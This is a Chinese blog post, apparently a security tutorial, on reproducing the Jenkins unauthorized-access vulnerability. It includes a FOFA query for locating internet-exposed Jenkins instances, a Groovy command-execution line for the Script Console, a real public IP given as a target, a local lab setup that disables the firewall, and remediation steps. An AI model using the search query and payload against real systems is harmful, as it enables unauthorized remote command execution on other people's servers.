Jenkins未授权访问漏洞

黑白时光les2024-08-04 15:56

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

复制代码 
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

复制代码 
#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138

下载安装包,版本1.620.1.1.norach

复制代码 
wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

安装Jenkins

复制代码 
rpm -ivh jenkins-1.620-1.1.noarch.rpm

启动Jenkins服务

复制代码 
service jenkins start

关闭防火墙或放行8080端口

复制代码 
systemctl stop firewalld.service

访问服务地址

http://192.168.30.138:8080/manage

http://192.168.30.138:8080/script

复制代码 
#执行命令
println "whoami".execute().text


漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。
相关推荐
cxyll12342 小时前
postman+newman+jenkins接口自动化
自动化·jenkins·postman
爱隐身的官人2 小时前
应急响应-模拟服务器挂马后的应急相关操作
网络安全·应急响应
MUY09902 小时前
应用控制技术、内容审计技术、AAA服务器技术
运维·服务器
楠奕2 小时前
elasticsearch8.12.0安装分词
运维·jenkins
网安INF2 小时前
【论文阅读】-《SIGN-OPT: A QUERY-EFFICIENT HARD-LABEL ADVERSARIAL ATTACK》
论文阅读·人工智能·网络安全·对抗攻击
测试老哥2 小时前
pytest+requests+allure自动化测试接入Jenkins学习
自动化测试·软件测试·学习·测试工具·职场和发展·jenkins·pytest
Sadsvit3 小时前
源码编译安装LAMP架构并部署WordPress(CentOS 7)
linux·运维·服务器·架构·centos
中国lanwp3 小时前
Jenkins Pipeline中参数化构建
java·jenkins
java资料站3 小时前
Jenkins
运维·jenkins
苦学编程的谢3 小时前
Linux
linux·运维·服务器
热门推荐
01UV安装并设置国内源02DeepSeek更新!速览DeepSeek V3.1新特性03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04KGG转MP3工具|非KGM文件|解密音频05蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接06【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)072025最新国内服务器可用docker源仓库地址大全(2025年8月更新)08Spring 调试终于不再痛苦了09Claude Code VSCode集成开发指南:AI编程助手完整配置10【大模型实战篇】部署GPT-OSS-120B踩得坑(vllm / ollama等推理框架)